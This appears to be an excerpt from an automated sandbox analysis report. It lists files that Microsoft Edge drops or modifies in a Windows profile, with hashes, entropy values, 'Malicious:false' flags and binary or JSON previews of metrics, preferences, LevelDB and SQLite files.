                                                        SHA-512:5D849D46FC8C7DCFDEC9E5D292BF1DF640CE6DBA6F5D958049FD1348ACF9C4AAB2BDA27AA41667E8289BA249E85024E46166C7461412B18C0A7D99CE5D64D4AD
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:...@..@...@.....C.].....@................i...X..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".wfvnsn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.............."......................w..U.oE..>.........."....."...24.."."JtyQ1A2NEIlw0A1806yiQy/yZBiHUYGocRJ4ref8zwc="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...f..a.. @..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .`2.......y.....

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67235833-1C70.pma

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4194304
                                                        Entropy (8bit):0.4140621252369185
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:244C37165130EED5E184CABDDBF95610
                                                        SHA1:5D6982795C1E00B201FEB60D85D267FC83F829F4
                                                        SHA-256:E2516F061BA1F27270BE2589B3FEC8E99C539724A72084F900F6B6E3D8121196
                                                        SHA-512:EDC4A87DF77F28194C30C49561058D953BA424DD15E43C11384E8FC115C0663437639E7E7E8C7C163B86007E3DD8F8A6673E8CB90D597E98940F0199C8D47ED3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:...@..@...@.....C.].....@...............`{...z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".wfvnsn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.............."......................w..U?:K..oE..>.........."....."...24.."."JtyQ1A2NEIlw0A1806yiQy/yZBiHUYGocRJ4ref8zwc="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...f..a.. @..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6...... .2.

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6723583A-14D0.pma

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4194304
                                                        Entropy (8bit):0.04544247584372713
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6DDB0FEC50779A3300D6A0D579DB2FE8
                                                        SHA1:04749F66CCC07322120AE522F6A750D0FE26C681
                                                        SHA-256:91C7F4AA336EB8950C1A2F2428DE4D4EA576CEC762CC14A040E7C5A6EC0FC062
                                                        SHA-512:61AFBCC6D3F87EC79BAD3000AC576D469210E04F608FE49F240EB1FCE29F626F04EE141FE4773631D86910EF3A7C1D6C35AD4C9410BC3810C7C1C8516E6EBA8D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:...@..@...@.....C.].....@...............@e...T..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".wfvnsn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.............."......................w..U.oE..>.........."....."...24.."."JtyQ1A2NEIlw0A1806yiQy/yZBiHUYGocRJ4ref8zwc="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...f..a.. @..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2...

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):280
                                                        Entropy (8bit):4.148816143243253
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:615DE8EBA385564F4C7C695D15B15296
                                                        SHA1:9881A42FECA4A67C63EDDDD191995C5D6F1347D9
                                                        SHA-256:7ECF7405D8438F23D8373E87DAC39BA8963B2E8BEB94A6D57E526376ED7F54AE
                                                        SHA-512:22AFBAD8CF3C20084584C8B207D66604994CF48C266761395DC474040E5C089D6FBD4AA852F75E3B89F1A300EE9BCB338FBF1D182CDB7831B7A90736AACC1258
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:sdPC....................x.....RG..zl.!{'"JtyQ1A2NEIlw0A1806yiQy/yZBiHUYGocRJ4ref8zwc="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................2e0302ca-60d4-43ae-a7a2-15a4516f8209............

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0cfed0f0-e29e-4fb0-a14e-c43134859a5d.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):9760
                                                        Entropy (8bit):5.0735548341462255
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:E13F1934638DD62C6B25C72E3BCC4118
                                                        SHA1:67551CCD18DD753F93CF9ADE8493C3C782DFC528
                                                        SHA-256:67FE981EFCF63ACCF2B313B2A9CBB49F28A8C46ACF9937B80971130B4C19E1E5
                                                        SHA-512:8D801776C49EE98330A8FEB8BC3E983869F1344E9B4D56E38B3B758E2C4E01D6E2582C2C90DD04AF91204E0FDA6E3A20191D1121840F2E9D3329B334A8E1DC65
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374843188609672","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatm

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\672b9ffc-55f6-4091-8096-7d7d61403abf.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:modified
                                                        Size (bytes):30210
                                                        Entropy (8bit):5.564892069111449
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A4AD8C0785F622E2B23D0E4B09E0E18A
                                                        SHA1:34DC10BAE462EFE2C33F9FE0373CB7B80CC68B38
                                                        SHA-256:18CBC2873B917325C01637AC29DDDCD343443B84883AD89C358E0942DCA3051B
                                                        SHA-512:F6FDE36536768930A90A4D7AE8D1B212A63E27421651B42D15653BA0DC5BEC0BD31459F107F4100B6CE752C6C8EE8D851FB23AA0787CDE55AAA0BBC0D6FC41B4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13374843188169105","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13374843188169105","location":5,"ma

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\88a9390f-8466-4a92-bd68-58663964a632.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):9760
                                                        Entropy (8bit):5.0732631544026825
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6059C07FD9D17EA7504E12CC774FCC2F
                                                        SHA1:D7A52B95ACBEAECF0E133E16BDA86B98AFD0E8B6
                                                        SHA-256:CF6B2DE3B65F976EBDE954B7DB85A36BADBA8E63AA9F1BBE01E3E4F2C71908AE
                                                        SHA-512:115729A7C08C504FD089EA2550FA69ABA8810D6AB9C9F33289A81BDB26BF9E1C5E5A6512937050595CAE9FF0A4575A9B6564B53E5208BA6BF587C8E2A79EB402
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374843188609672","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatm

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):33
                                                        Entropy (8bit):3.5394429593752084
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F27314DD366903BBC6141EAE524B0FDE
                                                        SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                        SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                        SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:...m.................DB_VERSION.1

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):309
                                                        Entropy (8bit):5.185555718483508
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:74AC61AF57FFA9F6CBFAB7008624E861
                                                        SHA1:B340261701322EC00D02A9C81C6A2DAC75CD4143
                                                        SHA-256:24645EBCDAAF5E5EDA760AD1275B99168AA416F514FC150A24A90F7448BE2456
                                                        SHA-512:A3193E865663FC3255A8ECBD0FD94E255F5B8672D5F5BDEC9DC7C716CE1EABB77EEDDE7C71CFF0AB171FACD701CEF2E64B7D787011256936118778F49397304A
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:10.722 1ce0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/10/31-06:13:10.764 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):81875
                                                        Entropy (8bit):6.081952059859238
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C4C6A98F65529CCFA4717C6202181647
                                                        SHA1:02F606AA6C9D9FC68E14C5DD1EBDF7EBFCA619AE
                                                        SHA-256:F7D8D6F3B8E87FF49131D14C9DB8B93386F9D2F8DA1F43E6437834EC48334416
                                                        SHA-512:349665833D6C6A45E186C3E9450C00F44968DD3B022FDEF82B88EDBC263F9798D61CA86AEE25E8C4D8ECB52E5147D2AF5C97CF6291AA436DF7090868D4AF50A1
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:...m.................DB_VERSION.1o.F..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13341059034905508.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):336
                                                        Entropy (8bit):5.025056675420859
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:2D4FC51954FE0348CE4DEBA96A98D681
                                                        SHA1:E6C4B10214576CCCE9920CAF84B9D1A7F677FF6A
                                                        SHA-256:461C518BF32AB41332E80B10F8D144346275952710644B129C2FB68ADEC891CD
                                                        SHA-512:7F1DAC474865A07537B4CC6E03789CF20D83D9FF98A6B5480F8E768344512FA927321A7BEEC5DD2E42870211BC8292EF1720D50CBBB8907115DF40F8C3B9168C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:10.440 1da0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/10/31-06:13:10.442 1da0 Recovering log #3.2024/10/31-06:13:10.523 1da0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Collections\collectionsSQLite

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):0.4947385728088827
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:29C9AF42D59BA452C914D337F83778D8
                                                        SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                        SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                        SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):28672
                                                        Entropy (8bit):0.43508159006069336
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F5237AED0F897E7619A94843845A3EC3
                                                        SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                        SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                        SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                        Category:dropped
                                                        Size (bytes):10240
                                                        Entropy (8bit):0.8708334089814068
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                        SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                        SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                        SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):638606
                                                        Entropy (8bit):5.996763751440564
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:950DFB43E8B9EBB5BED031D6D7DFAFC0
                                                        SHA1:EEE8C6B2169EEC83935A257004CB88BF4DC6FFCC
                                                        SHA-256:63C9D0DA7BA2C8FC3ABECC2D497C347A5EB97FEDBD93832AE9D22EF8CD5370DA
                                                        SHA-512:8B0D0B9F710E87ADA01E743451F06BBC23F33A91A7F35910852B1592275398E8288E65CF4CE34CAB77914DEA8C3BE620F5776BEE28BA699B2BC8F87B10255B60
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:...m.................DB_VERSION.1..&..................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":9,"bloomFilterArraySize":3780241,"primeBases":[5381,5381,5381,5381],"supportedDomains":"nvtbJp/9RhJ3t1XbyizjtRqVC4bjDAcDy2k4mUQL5KxCs1Ot6MIVmuYiBD5st3Z8iOhdEQROgj8RhGoxha9D0h69SVGQo4x41L2z165VPHt6MhCwezHAKBYins3GNNlstfcZVOaKjQ/8+KHJvOLQcZbvdpNw6xla0SMUVosYIxr0zkugtr4t/duYfvZrB0dP7l6lqnCz95qezS7lLLQ7p9wQQYEJDhgsipILqzqb8n/n4q/774BtQxswa6ow5w1Idik6mFGiRdLGPBjILOPKqQvpkIpepPeYdEVLAEhQqJ9DCRM1hYaOQPlt//9v8sjRgiM9TqQGTYE1VV5dM1/7r11Dkh0+hJRwgw+NMUAAVhM3gP5TNq5Ny8cTWXCaJe9PlSpU0p5FxYFbnX0ouf34wXJ69qiZECBpkLnbCZv7D4v834n2I8n0VBELRDdMlCOw0BgUmGKjkj6GK0ZeDxRo6DTAv0QEUCELgYa8oZ7hTTbd4WURrrv+S64h2rRFmfFE0X4THiVwKMVj2eoH5o/fmRGB2AiVYOEY0AJMhAA2sNLVmqzUFwo46+ADBGzAzIIEueilJN3giNnV/LjIOu53XWm3Tv9SAhWQc4ArqLEkH0ccj8Ti3BIDS2/iEjABGeZDWWHfJ6GXUez9yzi5b2DMvc89laBRMsmiP3k2S4G6QUC5TIBK2F9/00dtqFJtNefExQKLXFy4+m/ARiSH3LA1YTAW326f/2wSRopnKQEry3j4M+NQSsTD7SHKX4M5S1YU87KYbQHJxgQ5HzLdeFkXoZRjRDauBLIA6Md

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):142
                                                        Entropy (8bit):4.967750369566255
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:490FCDC5EA784ADF1EE63AF77890699E
                                                        SHA1:50CB9E06F9899078DF1BB1F34D743FE8E46A719E
                                                        SHA-256:6038731BAF994AB6029DFA6C30FA328F54D2796BABDA5F28787B144A9785CBA3
                                                        SHA-512:01B21C9D672B4C19BBA75CBC7731615939DDA99758F977625DECCFA4897AA927007E664A2B1B9A4152E6D5432A294A81A30427C061DF1A9D25A4AD313C490475
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:MC5z9................BLOOM_FILTER_EXPIRY_TIME:.1730455993.450452...G................BLOOM_FILTER_LAST_MODIFIED:.Thu, 31 Oct 2024 09:33:19 GMT

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):638581
                                                        Entropy (8bit):5.996047053873008
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F649FF9F95962C0A8B3449432CA977FB
                                                        SHA1:61C2C8E8C1E22D9E6EF991E756FA2DA8276D511F
                                                        SHA-256:0D979D61C503F174E444CFACCAA0F36CA07548D5F0AB7DD37ABB8ADC0C65412A
                                                        SHA-512:163C440FE27405ED94B2E31FD919C5E71958BA954820A8375A5646DEF6B92D03DDB7E22DA8E6F0190B33A5D0016026429A16216EB08C1CA65339CC393DA8539D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":9,"bloomFilterArraySize":3780241,"primeBases":[5381,5381,5381,5381],"supportedDomains":"nvtbJp/9RhJ3t1XbyizjtRqVC4bjDAcDy2k4mUQL5KxCs1Ot6MIVmuYiBD5st3Z8iOhdEQROgj8RhGoxha9D0h69SVGQo4x41L2z165VPHt6MhCwezHAKBYins3GNNlstfcZVOaKjQ/8+KHJvOLQcZbvdpNw6xla0SMUVosYIxr0zkugtr4t/duYfvZrB0dP7l6lqnCz95qezS7lLLQ7p9wQQYEJDhgsipILqzqb8n/n4q/774BtQxswa6ow5w1Idik6mFGiRdLGPBjILOPKqQvpkIpepPeYdEVLAEhQqJ9DCRM1hYaOQPlt//9v8sjRgiM9TqQGTYE1VV5dM1/7r11Dkh0+hJRwgw+NMUAAVhM3gP5TNq5Ny8cTWXCaJe9PlSpU0p5FxYFbnX0ouf34wXJ69qiZECBpkLnbCZv7D4v834n2I8n0VBELRDdMlCOw0BgUmGKjkj6GK0ZeDxRo6DTAv0QEUCELgYa8oZ7hTTbd4WURrrv+S64h2rRFmfFE0X4THiVwKMVj2eoH5o/fmRGB2AiVYOEY0AJMhAA2sNLVmqzUFwo46+ADBGzAzIIEueilJN3giNnV/LjIOu53XWm3Tv9SAhWQc4ArqLEkH0ccj8Ti3BIDS2/iEjABGeZDWWHfJ6GXUez9yzi5b2DMvc89laBRMsmiP3k2S4G6QUC5TIBK2F9/00dtqFJtNefExQKLXFy4+m/ARiSH3LA1YTAW326f/2wSRopnKQEry3j4M+NQSsTD7SHKX4M5S1YU87KYbQHJxgQ5HzLdeFkXoZRjRDauBLIA6Md8De8f//+Hv80XHcgAU0zmGNeBlrxwU6r/f3YZYLG4Tq4

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):5.230771933245479
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C0A69122C4A5082EA9C3D9DC4D36A523
                                                        SHA1:70E30052D9BCB44DB01BB9C125AF38E4D6013998
                                                        SHA-256:AA19C1C276ED1581E6DCCCB3FD09DEEAB44EC22D77EB8E55E7CF01C8FC1A606D
                                                        SHA-512:41BA03F04E31F23C1596F17F2A2302E94139381B9C01C49808627DFC2FC796D0D1B843692335E834A3E4D011B60190632D6CC51172F9168A57360171CC2D6D44
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.167 1578 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/10/31-06:13:08.167 1578 Recovering log #3.2024/10/31-06:13:08.168 1578 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/10/31-06:13:13.477 1cf4 Level-0 table #5: started.2024/10/31-06:13:13.502 1cf4 Level-0 table #5: 638581 bytes OK.2024/10/31-06:13:13.504 1cf4 Delete type=0 #3.

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:OpenPGP Secret Key
                                                        Category:dropped
                                                        Size (bytes):103
                                                        Entropy (8bit):5.267898014713841
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FBE0870CC1C26D218BC257BAA053EED2
                                                        SHA1:4337B33B02CCE2B1E9BCF5E3A8DA04487A573999
                                                        SHA-256:B68A07924C707C4AB06CBD0D3BF044C1EDFC309E06492D1206D8BD05755B3539
                                                        SHA-512:B829214F940B31EC2AB5CA14E015F81A5F366E853DE4C3565409C2DB52306A567496F78ED62138154FDD4C36DA3DD5482B9046708C205801AD2D8D8FC850720E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:.|.."....leveldb.BytewiseComparator......."..7...............&.BLOOM_FILTER:.........DB_VERSION........

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):375520
                                                        Entropy (8bit):5.354139980859267
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:84EDBE7C932B670F2D18658481086848
                                                        SHA1:93D852CDF8FD9DCFC0F76B7585B3334CCF3F667E
